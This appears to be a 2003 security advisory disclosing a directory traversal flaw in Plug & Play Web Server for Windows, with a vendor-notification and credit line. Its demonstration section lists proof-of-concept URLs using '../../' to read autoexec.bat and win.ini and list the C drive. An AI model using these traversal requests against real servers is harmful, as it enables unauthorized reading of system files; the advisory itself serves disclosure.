Reported September 18, 2003, by Bahaa Naamneh.

 

 

VERSIONS AFFECTED

 

  • Plug & Play Software' s Plug & Play Web Server for Windows

 

DESCRIPTION

 

A vulnerability in Plug & Play Software's Plug & Play Web Server for Windows can result in unauthorized read access to any file located on the vulnerable server. By using the "../" or "..\" string in a URL, an attacker can gain read access to any file that resides outside the intended Web-published file system directory.

 

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 

Examples:

 

---------

 

http://localhost/../../autoexec.bat

 

http://localhost/../../windows/win.ini

 

http://localhost/../../  \[show the files and the folders in C drive - if the 'Show Directory list when homepage does not exist' option is active.\]

 

VENDOR RESPONSE

 

Plug & Play Software has been notified.

 

CREDIT                                                                                                       
Discovered by Bahaa Naamneh.